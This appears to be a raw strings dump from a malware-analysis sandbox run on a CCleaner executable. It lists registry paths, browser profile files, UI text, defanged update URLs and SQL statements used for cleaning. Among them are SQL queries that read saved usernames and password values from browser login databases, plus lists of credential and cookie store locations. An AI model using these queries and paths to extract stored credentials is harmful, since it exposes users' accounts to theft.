DA=%s
RK=%s
RU=%d
CK=%d
SK=%s
VK=%s
VA=%s
CR=%d
PF=%d
EI=%d
FL=%d
IIT=%d
FI=%d
SI=%d
JPSAPI.DLL
%d/%d/%d %d:%d:%d %s
iexplore.exe
safari.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
.Startup
.CommonStartup
{%s-%s-%s-%s-%s}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
WindowsInstaller
ParentKeyName
msiexec.exe /X%s
msiexec.exe
/fpecms %s
SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\
msiexec
*.ico
*setup.exe
*msiexec.exe
*.dll
*.exe
imageres.dll
"%s" %s
msiexec.exe %s%s/X%s
G%m/%d/%Y %I:%M:%S %p
Kernel32.DLL
Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved
mscoree.dll
Software\Microsoft\Windows\CurrentVersion\Ext\Settings
{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}
{E0DD6CAB-2D10-11D2-8F1A-0000F87ABD16}
*.lnk
Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder
hkey
%Commonprogramfiles%
*\%s\*
%s|%s|%s
|%s|%s|%s
Windows Shutdown
Windows Boot
Cancelled Operation
J%s-%d
%d - %s
CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell
CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell\
Gntuser.dat
rE]*desktop.ini
desktop.ini
JWebpageIcons.db
//NoLogo "%s"
cscript.exe
history.dat
places.sqlite
urlbarhistory.sqlite
prefs.js
*.png
*\k-meleon*prefs.js
user_pref("kmeleon.MRU.URL
downloads.rdf
downloads.sqlite
cookies.sqlite
webappsstore.sqlite
*.sqlite
\indexedDB
permissions.sqlite
index.sqlite
*index.sqlite
*\indexedDB\*.sqlite
*\OfflineCache\index.sqlite
*\permissions.sqlite
formhistory.dat
formhistory.sqlite
signons.txt
signons2.txt
signons3.txt
signons.sqlite
logins.json
signon.SignonFileName
\prefs.js
sessionstore.js
sessionstore.bak
session.json
user_pref("kmeleon.plugins.sessions2
searchhistory.xml
content-prefs.sqlite
*-journal;*.tmp
global.dat
global_history.dat
search_field_history.dat
opera.dir
download.dat
vlink4.dat
autosave.win
autosave.win.bak
session.db
session.dbak
opera6.ini
opera.exe*
typed_history.xml
wand.dat
Login Data
*.idx
cookies4.dat
*.dat
cache_groups.xml
psindex.dat
Windows.Security.Credentials.PasswordVault
%LocalAppData%\Packages\windows_ie_ac_001\AC\INetCookies
*.xml
*\windows_ie_ac_001\AC\*
$Recycle.Bin
%userprofile%\AppData\Local\Microsoft\Windows\History
%userprofile%\Local Settings\History\History.IE5
Microsoft\Windows\History
%userprofile%
Local Settings\History\History.IE5
\Microsoft\Windows\
Packages\windows_ie_ac_*\AC\INetHistory
InetCpl.cpl, ClearMyTracksByProcess 1
RunDll32.exe
container.dat
*Low\History.IE5*
%userprofile%\Local Settings\Temporary Internet Files
Packages\windows_ie_ac_*\AC\INetCache
Packages\windows_ie_ac_*\AC\AppCache
SuggestedSites.dat
\cache.trash
*.old;*.tmp
%localappdata%\Google\Chrome\User Data\Default\Cache
%localappdata%\Google\Chrome\User Data\Default\Media Cache
%localappdata%\Google\Chrome\User Data\Default\GPUCache
*\JumpListIcons*\*.tmp
\Origin Bound Certs
*.localstorage
*.indexeddb
\IndexedDB
host_key
Databases.db
Origin Bound Certs
*databases\http_*_0*
*databases\https_*_0*
\Web Data
History Index*.*
*.tmp
Web Data
\Login Data
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Thumbnail Cache
databases\Databases.db
keychain.plist
Apple Computer\Safari\Bookmarks.plist
\cookies.plist
\Cookies.binarycookies
\StorageTracker.db
\ApplicationCache.db
manifestURL
ApplicationCache.db
StorageTracker.db
cookies.plist
Cookies.binarycookies
HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
%SystemDrive%
\Windows.old*
\$WINDOWS.~BT
\$WINDOWS.~Q
\\?\%s
Microsoft\Windows\WebCache
WebCacheV01.dat
WebCacheV24.dat
iexplore.exe*
G.bmp
.jpeg
.wave
.midi
.html
%s\UserChoice
%s\OpenWithProgids
%s\OpenWithList
{e8cc4cbe-fdff-11d0-b865-00a0c9081c1d}
msmsgs.exe
{D2B7A809-15DC-40B4-A1E1-C61EA97191DB}
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted
Software\Microsoft\Windows\CurrentVersion\Uninstall\
mozillaplugins
windows
%s\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
CLSID\%s
Software\Classes\CLSID\%s
{00020424-0000-0000-C000-000000000046}
%systemroot%
%systemroot%\system32
ImagePath - %s
select * from meta where key='last_compatible_version';
select host_key, creation_utc from cookies;
origin_bound_certs
select origin, creation_time from origin_bound_certs;
ie7_logins
SELECT url_hash, password_value, date_created FROM ie7_logins;
logins
SELECT origin_url, action_url, username_element, username_value, password_element, password_value, submit_element, signon_realm, ssl_valid, preferred, date_created, blacklisted_by_user, scheme FROM logins;
bookmarks.db
stash.db
favorites.db
%s\cookies
%s\Origin Bound Certs
select host_key,creation_utc from cookies;
*Origin Bound Certs
select origin as host_key, creation_time as creation_utc from origin_bound_certs;
delete from origin_bound_certs where creation_time not in (
delete from origin_bound_certs;
%s\Local Storage
%s\IndexedDB
http_
https_
%s\databases\Databases.db
delete from urls where starred_id NOT in (select id from starred) or starred_id = 0
delete from segments where url_id not in (Select id from urls)
delete from keyword_search_terms
select id, url, favicon_id from urls
delete from urls where id = %s
select id, url from omni_box_shortcuts
delete from omni_box_shortcuts where id = '%s'
select * from meta where key='Default Search Provider ID';
delete from keywords where show_in_default_list = 0 and safe_for_autoreplace = 1
and id != %d
select id, favicon_id from urls
delete from thumbnails where url_id not in (
select id, page_url, icon_id from icon_mapping
page_url
delete from icon_mapping where id = %s
delete from thumbnails where url_id not in (Select id from icon_mapping)
downloads_url_chains
delete from %s
delete from ie7_logins
delete from logins
\Google\Chrome\User Data
\Google\Chrome SxS\User Data
\MapleStudio\ChromePlus\User Data
\ChromePlus\ChromePlusUserData
G\Opera
Opera*
\Opera\Opera\profile
\Opera\Opera7\profile
\Opera\Opera75\profile
\Opera\Opera 8 Beta\profile
\Opera\Opera 9 Beta\profile
\Opera\Opera 9\profile
\Opera\Opera 10 Beta
\Opera\Opera
\Opera\Opera 10
\Opera Software\Opera Stable
\Opera Software\Opera Next
\Opera Software\Opera Developer
\Opera\profile
\Opera 9\profile
%Program Files%\Opera\profile
%Program Files%\Opera 9\profile
lhXXp://
hXXps://
DET_OPERA
DET_MOZILLA
DET_MOZILLA_GOOGLE_TOOLBAR
DET_SAFARI_PASSWORD
%ProgramFiles%\Safari\Safari.exe
DET_CHROME
C:\Windows\Cookies
\Cookies.plist
Windows Registry Editor Version 5.00
[%s%s%s]
x,
\Mozilla\Firefox
\Mozilla
\Mozilla\SeaMonkey
\profiles.ini
\Profiles\profiles.ini
https
\cookies.txt
\cookies.sqlite
\webappsstore.sqlite
select scope from webappsstore2;
select domain from webappsstore;
*cookies.sqlite
*webappsstore.sqlite
delete from %s where %s not in (
delete from %s;
%s\indexedDB
http   
https   
delete from moz_cache where Key like 'http%//
delete from moz_hosts where id=%d and type='offline-app' and permission=1;
4llX-%X
DelegateExecute
Gopera6.adr
bookmarks.adr
persistent.txt
icons\persistent.txt
*.ini
Gcombase.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
%s\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
SOFTWARE\Apple Inc.\Apple Application Support
plUtil.exe
-convert xml1 "%s" -o "%s"
-convert binary1 "%s" -o "%s"
select url, iconID from PageURL;
delete from IconData where iconID not in (%s);
delete from IconInfo where iconID not in (%s);
delete from PageURL where iconID not in (%s);
delete from PageURL;
UPDATE sqlite_sequence SET seq=0;
%s\LocalStorage
%s\LocalStorage\StorageTracker.db
delete from Origins where origin = "%s";
%s\Databases\Databases.db
delete from Origins where origin in (select origin from databases where guid not in ("%s"));
delete from Databases where guid not in ("%s");
delete from sqlite_sequence where name = 'Databases';
%s\ApplicationCache.db
select manifestURL, id from CacheGroups;
delete from CacheAllowsAllNetworkRequests where cache in (select id from caches where cacheGroup not in ("%s"));
delete from CacheEntries where cache in (select id from caches where cacheGroup not in ("%s"));
delete from CacheGroups where id not in ("%s");
delete from CacheResourceData where id in (Select resource from CacheEntries where cache in (select id from caches where cacheGroup not in ("%s")));
delete from CacheResources where id in (Select resource from CacheEntries where cache in (select id from caches where cacheGroup not in ("%s")));
delete from CacheWhitelistURLs where cache in (select id from caches where cacheGroup not in ("%s"));
delete from FallbackURLs where cache in (select id from caches where cacheGroup not in ("%s"));
delete from caches where cacheGroup not in ("%s");
delete from CacheWhitelistURLs;
delete from FallbackURLs;
1%s_%d
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\
Software\Microsoft\Windows NT\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted
Software\Microsoft\Windows\Help
Software\Microsoft\Windows\HTML Help
Software\Microsoft\Windows\CurrentVersion\Installer\Folders
Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache
SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs
Software\Microsoft\Windows\ShellNoRoam\MUICache
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Classes\%s
%s%s%d
SOFTWARE\Classes%s%s
Jselect url from favorites;
select url from snapshots;
select url from sites;
g%s|%s|%s|%s|%s
G*extensions.json
addons[id=%s]
Update addon Set active = %d, userDisabled = %d Where id = '%s'
extensions.pendingOperations
Select location from addon Where id = '%s'
addons.json
addons.sqlite
Select creator From addon where id = '%s'
extensions.json
extensions.sqlite
Select addon.id, locale.name, locale.description, addon.active, addon.userDisabled, addon.appDisabled, locale.creator, addon.type, addon.defaultLocale, addon.descriptor, addon.location, addon.version, addon.pendingUninstall, addon.installDate, addon.updateDate
From addon Inner Join locale On addon.defaultLocale = locale.id
Where addon.type = 'extension'
Update addon Set pendingUninstall = 1 Where id = '%s'
plugin.state.
\pluginreg.dat
chrome-extension_%s_0
.localstorage
Dplugins.plugins_list
G"url":
G%s.%d
G%d.%d
SELECT %s FROM %s
WHERE %s
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
%s\Connection
%s_%s=
gWinInet.dll
hXXps://*
hXXps://VVV.piriform.com/go/app_cc_get_update?v=%s&l=%s&o=%s
%s?v=%s&l=%s&o=%s
&a=%s
%s.exe
H%c%c%c%c
P0x%x: %s
hXXps://license.piriform.com/update/?p=%s&c=%s&cv=%s&l=%s&o=%s&lk=%s&mk=%s
%s/INSTDIR='%s' /L=%s
/COMMANDLINE='%s'
%s?p=%s&v=%s&l=%s&o=%s
&lk=%s
&mk=%s
Error updating CCleaner %s- 0x%x: %s
Extra error updating CCleaner %s- 0x%x: %s
Mozilla/4.0
hXXp://crash-reports.piriform.com/submit
Send Report
Report sent successfully.
Error sending report: too many reports.
Error sending report.
GPiriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
Pwer.dll
tCCleaner Consent Key
CCleaner.exe
CCleaner crash report
NTDLL.DLL
KERNEL32.DLL
dbghelp.dll
rpcrt4.dll
%s\%s.dmp
%d minutes remaining
%sXX
x-x-x-xx-xxxxxx
Disassembler->Instruction.Address == Address
Disassembler->Instruction.Length < MAX_INSTRUCTION_LENGTH
X86Instruction->SrcAddressIndex == OperandIndex || X86Instruction->DstAddressIndex == OperandIndex
!(Operand->Length & 1)
X86Instruction->OperandSize == 2
Instruction->OpcodeLength == 2 && X86Instruction->HasModRM && Instruction->OperandCount == 2
X86Instruction->OperandSize == 8
X86Instruction->OperandSize >= 4
!(Instruction->Operands[0].Flags & 0x7F)
!(Instruction->Operands[1].Flags & 0x7F)
!(Instruction->Operands[2].Flags & 0x7F)
Instruction->OperandCount == 1
!Instruction->CodeBranch.AddressOffset
Operand1->Length <= 0xFF
Operand1->Flags & OP_ADDRESS
Operand1->Type == OPTYPE_OFFSET
!(Operand1->Flags & (OP_GLOBAL|OP_FAR))
!Instruction->DataDst.Count
!Instruction->DataSrc.Count
Operand->Length <= 0xFF
Instruction->OperandCount == 1 && Operand1->Length
!(Operand->Flags & 0x7F)
>Operand->Flags & (OP_EXEC|OP_SRC|OP_DST)
>OperandIndex < 2
OperandIndex == 1
Operand->Length == 1
X86Instruction->OperandSize >= Operand->Length
(Operand->Flags & OP_EXEC) && (Instruction->Groups & ITYPE_EXEC)
(Operand)->TargetAddress
(Operand)->Length <= 8
(Operand)->Flags & OP_FAR
[!((Operand)->Flags & OP_FAR)
X86_Registers[Operand->Register]
Operand->Length
*.jpg
*.raw
*.gif
*.jpeg
*.bmp
*.tif
*.tiff
*.psd
*.mp3
*.wma
*.ogg
*.wav
*.aac
*.flac
*.aif
*.aiff
*.aifc
*.aifr
*.midi
*.mid
*.rmi
*.mp2
*.doc
*.xls
*.ppt
*.odt
*.ods
*.pdf
*.docx
*.xlsx
*.pptx
*.odc
*.pps
*.avi
*.mov
*.mpg
*.mp4
*.flv
*.wmv
*.mpeg
*.mpe
*.mpv
*.ifv
*.zip
*.zipx
*.rar
*.ace
*.arj
*.cab
*.tar
*.eml
*.pst
*.ost
Gntdll.dll
\\.\%s
\\?\%s%s%s
\\.\Scsi%d:
ATA/ATAPI-%d
ATA-%d
---- [Xh]
fmifs.dll
*$Recycle.Bin*
Assertion failed: %s, file %s, line %d
c:\%original file name%.exe
1, 0, 0, 1
Import
Export
Only delete files in Windows Temp folders older than 48 hours
v1.31.325
You can download the latest version, report bugs and submit feature requestes at the follwoing website :)
(e.g. *.zip;*.rar)
This will allow CCleaner to keep your persistent logins for websites, such as Hotmail, GMail and Yahoo Mail
{8856F961-340A-11D0-A96B-00C04FD705A2}
Go to Website
Total support
License Key:
Crash report
The system and other applications have not been affected. A report has been created that you can send to Piriform to help identify the problem.
testEClick here to visit the CCleaner website at VVV.piriform.com/ccleaner
Would you like to visit the website to download it?8Click here to visit the Piriform website at Piriform.com
No issues were selected..Do you want to backup changes to the registry?
%1 removed.EDetails of files to be deleted (Note: No files have been deleted yet)
%1 cache cleaning was skipped..Firefox Temporary Internet Cache (%1 files) %2
T%1 needs to be closed to continue this operation.
Closing application...TThe application is taking a long time to close.
Intelligent Cookie Scan'Intelligently scan for cookies to keep?pThis will allow CCleaner to keep your persistent logins for websites, such as GMail, Outlook.com and Yahoo Mail.
Please re-enter your details.úiled to save registration key file.
Total supportvYour CCleaner Professional trial expires in %1 %2. Buy Now to continue benefiting from a cleaner, safer and faster PC.
Null license key
Null machine key
Invalid license key
Expired license key
Inactive license key8CCleaner could not be updated. Your license has expired.7CCleaner could not be updated. Your license is invalid.ePlease click the Purchase button below to renew your license, or contact support through our website.
&RegisterQThe latest version contains important changes. It is recommended that you update.
Close program after cleaning%Run CCleaner when the computer starts5Add "Run CCleaner" option to Recycle Bin context menu9Add "Open CCleaner..." option to Recycle Bin context menu=Only delete files in Windows Temp folders older than 24 hours
%Show prompt to backup registry issues Automatically check for updates to CCleaner6Show detailed log of Internet Explorer temporary files
Simple Overwrite (1 pass)
Advanced Overwrite (3 passes)
Complex Overwrite (7 passes),Show detailed log of Firefox temporary files
!Secure file deletion enabled - %1"Very Complex Overwrite (35 passes)
Enable Windows Jump List Tasks%Show initial results in detailed view
Windows Event Logs
&Import
E&xport
&Delete nowJCookies are being deleted. Are you sure you want to cancel this operation?dThis process will delete the selected cookie(s) from your system.
e.g. *.tmp;*.logCFor system safety reasons you cannot select this specific location.
Cannot delete MSI installer.,All selected restore points will be removed.DSelect a program from the list you want to remove from your computer
Free Space Only&Entire Drive (All data will be erased)9WARNING! ALL DATA ON SELECTED DISK DRIVES WILL BE ERASED!,To proceed with this, type the word %1 here:/Are you sure you want to cancel this operation?
Are you sure you want to do this?OThe operation has been completed.
Windows Explorer
Firefox
Opera
Windows Store
Index.dat files
Saved Passwords
Windows Log Files
Windows Error Reporting
FTP Accounts
Network Passwords
Old Windows Installation
Website Icons
9This will take effect next time the computer is rebooted.<You will lose any saved passwords if you select this option.cYour start menu will be reset, no items will be removed, although any custom ordering will be lost.NSystem tray cache will be reset, you need to restart the explorer.exe process.FThis will reset any saved Windows Explorer location and view settings.CThis will clear the most recently used programs list on start menu.
Wiping Free Space will significantly increase the amount of time the cleaning takes. We recommend you leave this disabled for normal usage.jThis will clear all Windows Event Logs from your computer. These logs are often used to diagnose problems.
Windows Services
Obsolete software key
Old Start Menu key
Unused registry key
uThe file %1 is referenced as a Shared DLL and doesn't exist. These are often left behind after uninstalling software.xThe file extension %1 references an invalid program identifier. These are often left behind after uninstalling software.jThe COM component %1 references an invalid CLSID. These are often left behind after uninstalling software.{The Application referenced at: %1 could not be located. These references are often left behind after uninstalling software.cThe Font %1 could not be found. These references are often left behind after uninstalling software.{The Application referenced at: %1 could not be located. These references are often left behind after uninstalling software.yThe Help File referenced at: %1 could not be located. These references are often left behind after uninstalling software.
The software key: %1 does not contain any information so can be removed. These references are often left behind after uninstalling software.
The key %1 does not contain any information so can be removed. These references are often left behind after uninstalling software.8A file referenced by a shortcut does not exist. File: %1tThe file referenced at: %1 could not be located. These references are often left behind after uninstalling software.wThe TypeLib referenced at: %1 could not be located. These references are often left behind after uninstalling software.tThe file referenced at: %1 could not be located. These references are often left behind after uninstalling software.~The Application %1 referenced at: %2 could not be located. These references are often left behind after uninstalling software.uThe CLSID referenced at: %1 could not be located. These references are often left behind after uninstalling software.tThe file referenced at: %1 could not be located. These references are often left behind after uninstalling software.
$Solution: Delete the registry value."Solution: Delete the registry key..Solution: Delete the DefaultIcon registry key.#Solution: Delete the shortcut file.
Save to text file...cThis process will delete the selected files(s) from your system.
5, 01, 00, 5075
ccleaner.exe

%original file name%.exe_3308_rwx_00401000_002C5000:




8%uEP3
SSSSSSSSSh
SSSSSSSSSSh
SSSSSSSSShJ
SSSSSSSSShM
SSSSSSSSShD
SSSSSSSSShG
t.Wj$j
SSSSSSSSShQ
G<SSh7
G<SSh
|$F.tMf
</tg<\tc<.ug
~$)~()|$
xSSSh
FTPjKS
FtPj;S
C.PjRV
<%u7j
X<%u2j
SSSSh
QSSSSh
~WVSSSSSSh
PSShd
Ht>Ht.HHt
htCp
<.tZ<>
t\HtEHt.Ht
H.SVW3
.FGy"
<0%u5
f;S.si
u u
,4,56,789
t:Ht.Ht"Ht
SSSSSSSSSh]
SSSSSSSSSh^
SSSSSSSSSh`
PSSSSSSh
SSSSSSSSSh6
SSSSSSSSSh7
SSSSSSSSSh5
SSSSSSSSSh:
%uASW
SSSSSSSSShW
SSSSSSSSShV
SSSSSSSSShe
SSSSSSSSShY
SSSSSSSSSShX
SSSSSSSSShU
SSSSSSSSShZ
uCSSSh
SSSSSSSSShT
SSSSSSSSSha
SSSSSSSSShc
d$$SSSSSSSSSSh
SSSSSSSSShN
SSSSSSSSShC
SSSSSSSSShk
98tCP
SSSSSSSSh
SSSSSSSSSShi
SSSSSSSSSh#
SSSSSSSSShP
SSSSSSSSSh"
SSSSSSSSSh
SSSSSSSSSh'
SSSSSSSSSh_
tCHt4Ht.Ht(Ht
SSSSSSSSSh!
SSSSSSSSSh$
SSSSSSSSSh%
SSSSSSSSShu
SSSSSSSSSh=
SSSSSSSSShx
SSSSSSSSShy
SSSSSSSSShz
SSSSSSSSSh|
SSSSSSSSSh}
SSSSSSSSSh>
SSSSSSSSSh~
SSSSSSSSSh?
SSSSSSSSShv
SSSSSSSSShw
SSSSSSSSSh{
SSSSSSSSShj
SSSSSSSSSSh`
SSSSSSSSShb
SSSSSSSSShd
SSSSSSSSSShf
SSSSSSSSShg
SSSSSSSSSShl
SSSSSSSSShm
SSSSSSSSSh1
SSSSSSSSSh2
SSSSSSSh$
SSSSSSSSShE
v%Sjd
SSSSSSSSSh<
SSSSSSSSShB
u1SSh
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
boost::filesystem::directory_iterator::operator  
kernel32.dll
Visual C   CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
GetProcessWindowStation
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
%d / %m / %y
%I : %M : %S %p
%m / %d / %y
%b %d %H : %M : %S %Y
3.8.1
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
nBreakpad/1.0 (Windows)

%original file name%.exe_3308_rwx_006C8000_00022000:




REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYS
ZwQueryKey
%Program Files% (x86)\boost\boost_1_54\boost/exception/detail/exception_ptr.hpp
1836216166
1953261156
boost thread: trying joining itself
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
LOGGING LIB internal error - should NEVER happen. Please report this to the author of the lib
%s_%s_%d-d-d_d-d-d.log
<Task xmlns="hXXp://schemas.microsoft.com/windows/2004/02/mit/task">
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Exec>
</Exec>
private\Net\Mozilla.cpp
UPDATE moz_places SET frecency = -MAX(visit_count, 1) WHERE id IN(SELECT h.id FROM moz_places h WHERE EXISTS (SELECT id FROM moz_bookmarks WHERE fk = h.id) OR EXISTS (SELECT id FROM moz_annos WHERE place_id = h.id AND expiration =
UPDATE moz_places SET frecency = 0 WHERE id IN (SELECT h.id FROM moz_places h LEFT OUTER JOIN moz_bookmarks b ON h.id = b.fk WHERE frecency < 0 AND (b.parent IN (SELECT annos.item_id FROM moz_anno_attributes attrs JOIN moz_items_annos annos ON attrs.id = annos.anno_attribute_id WHERE attrs.name = 'livemark/feedURI') AND visit_count = 0) OR SUBSTR(h.url, 1, 6) = 'place:')
%s[%d]: %s
SQLITE_OK
SQLITE_ERROR
SQLITE_INTERNAL
SQLITE_PERM
SQLITE_ABORT
SQLITE_BUSY
SQLITE_LOCKED
SQLITE_NOMEM
SQLITE_READONLY
SQLITE_INTERRUPT
SQLITE_IOERR
SQLITE_CORRUPT
SQLITE_NOTFOUND
SQLITE_FULL
SQLITE_CANTOPEN
SQLITE_PROTOCOL
SQLITE_EMPTY
SQLITE_SCHEMA
SQLITE_TOOBIG
SQLITE_CONSTRAINT
SQLITE_MISMATCH
SQLITE_MISUSE
SQLITE_NOLFS
SQLITE_AUTH
SQLITE_FORMAT
SQLITE_RANGE
SQLITE_ROW
SQLITE_DONE
CPPSQLITE_ERROR
select count(*) from sqlite_master where type='table' and name='%s'
Re&port
XMessageBox.ini
%s = %d
RegKey
FileKey
SpecialKey
ScriptKey
ExcludeKey
ccleaner.ini
portable.dat
%m/%d/%Y %I:%M:%S %p
l%d/%d/%d %d:%d:%d %s
MSG_CONFIRMCLEAN
MSG_WARNMOZCACHE
MSG_WARNMOZHISTORY
MSG_WARNTHUNDERBIRDCACHE
MSG_WARNTHUNDERBIRDHISTORY
MSG_WARNOPERACACHE
MSG_WARNCHROMECACHE
ShowFirefoxCleanWarning
ShowGoogleChromeCleanWarning
ShowOperaCleanWarning
%s%s%s%d%s
Google Chrome
l*64.exe
/select,"%s"
lGoogle Chrome
l%d%%
user32.dll
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache
Packages\windows_ie_ac_001\AC\Microsoft\Internet Explorer\DOMStore
Mozilla/4.0 (CCleaner, %s)
%d.%d%s%d
hXXps://VVV.piriform.com/inapp/ccshop
%s?a=%s&p=%s&c=%s&v=%s&l=%s&mk=%s&o=%s
&itag=%s
LKey
OnNavigateError = %d - %s
Clicked on %s (tag:%s)
All (*.*)
#HttpOnly_
DOMStore:hXXp://
DOMStore:hXXps://
lPiriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
lhXXp://VVV.piriform.com/go/app_cc_reg_renew
hXXp://VVV.piriform.com/auto
lhXXp://VVV.piriform.com/ccleaner/update
*64.exe
shell32.dll
Error: %d - %s
Text Files (*.txt)
*.txt
install.txt
%s%s%s%s%s
%s %s
PSAPI.DLL
\regedit.exe
regedit.exe
rundll32.exe
*%commonprogramfiles%*
%CommonProgramW6432%
%commonprogramfiles%
1|1|1|1|0|0|0
SystemAnalyzer.txt
l/select,"%s"
startup.txt
*\desktop.ini
Analyzing file content - %d
duplicate.txt
%s - %s %c
lPackages\windows_ie_ac_001\AC\Microsoft\Internet Explorer\DOMStore
Piriform.CCleaner
hXXp://VVV.piriform.com
hXXp://VVV.piriform.com/ccleaner
hXXp://VVV.piriform.com/go/app_cc_home_help
hXXp://VVV.piriform.com/go/app_cc_home_icon
hXXp://VVV.piriform.com/go/app_cc_home_title
hXXp://VVV.piriform.com/go/app_cc_home_pear
hXXp://VVV.piriform.com/go/app_cc_reg_purchase
license.ini
LicenseKey
autotrial.dat
business.dat
update.ini
lRecently Typed URLs
Mozilla - Cookies
Opera - Cookies
Google Chrome - Cookies
Delete Index.dat files
user.dat
ntuser.dat
usrclass.dat
v%d.d.d
%d.d.d
%s.ini
ResourceID_%d
FIREFOX
CHROME
OPERA
lbranding.dll
v1.00.001
v2.00.001
hXXp://VVV.piriform.com/go/app_cc_reg_renew
hXXp://VVV.piriform.com/ccleaner/update
Piriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
%s%s%s
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_USERS
HKEY_CURRENT_USER
history.txt
mPiriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
cookies.txt
Trial version (%d days remaining)
mhXXp://VVV.piriform.com/go/app_cc_social_facebook
hXXp://VVV.piriform.com/go/app_cc_social_twitter
hXXp://VVV.piriform.com/go/app_cc_social_googleplus
hXXp://VVV.piriform.com/go/app_cc_social_youtube
%s?a=%s&v=%s&l=%s
mhXXp://VVV.piriform.com/go/app_cc_home_help
m*64.exe
0x%x: %s
Error activating - %s
Error activating - %d: %s
&t=%s
hXXps://license.piriform.com/activate/?p=%s&c=%s&cv=%s&l=%s&lk=%s&mk=%s
hXXps://VVV.piriform.com/go/app_cc_pro_trialkey
hXXps://license.piriform.com/verify
hXXps://license.piriform.com/activate
%s/?p=%s&c=%s&cv=%s&l=%s&lk=%s&mk=%s
64.exe
mhXXp://VVV.piriform.com/go/app_cc_reg_purchase
mLicenseKey
mautotrial.dat
mbusiness.dat
mbranding.dll
Registry Key
cc_%ddd_ddd.reg
Reg Files (*.reg)
*.reg
SpecialKey1
registry.txt
CCScanreg.txt
%s - %s
*.piriform.com
login.live.com
mail.google.com
VVV.google.com/accounts
google.com/accounts
google.com
VVV.google.com
accounts.google.com
webmail.earthlink.net
mail.netscape.com
mail.yahoo.com
yahoo.com
webmail.aol.com
my.screenname.aol.com
fastmail.fm
mail.lycos.com
mail.ru
auth.me.com
ovi.com/services/signin
login.comcast.net
VVV.mail.lycos.com
mail.aol.com
icloud.com
screenname.aol.com
aol.com
facebook.com
twitter.com
%d / %d
Error %d - %s
%%.Þ
%%.ß
mMozilla/4.0 (CCleaner, %s)
log.txt
File %s does not exist.
- %s %c
mShowFirefoxCleanWarning
mShowGoogleChromeCleanWarning
mShowOperaCleanWarning
\macromedia.com\support\flashplayer\sys\
settings.sol
Shockwave Flash\macromedia.com\support\flashplayer\sys\
*\Shockwave Flash\*\#SharedObjects\*\macromedia.com\support\flashplayer\sys\settings.sol
*\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\*\macromedia.com*
macromedia.com
com.apple.Safari.plist
WebpageIcons.db
CCleaner requires Windows XP or later.
CCleaner64.exe
ccleaner_checkpoint.dat
